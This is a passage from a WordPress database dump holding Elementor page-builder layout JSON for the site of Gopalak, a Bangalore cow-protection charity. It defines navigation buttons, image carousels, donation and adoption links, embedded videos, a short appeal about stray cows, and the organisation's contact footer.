text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a95afbf\",\"elType\":\"widget\",\"settings\":{\"text\":\"Donate\",\"align\":\"center\",\"background_color\":\"#2A3F2D\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/campaigns\\/cattle-feed\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10999,1829,'_elementor_page_assets','a:0:{}'),(11001,1830,'_elementor_edit_mode','builder'),(11002,1830,'_elementor_template_type','wp-page'),(11003,1830,'_elementor_version','3.7.8'),(11004,1830,'_wp_page_template','elementor_canvas'),(11005,1830,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11006,1830,'_elementor_page_assets','a:0:{}'),(11008,1831,'_elementor_edit_mode','builder'),(11009,1831,'_elementor_template_type','wp-page'),(11010,1831,'_elementor_version','3.7.8'),(11011,1831,'_wp_page_template','elementor_canvas'),(11012,1831,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My 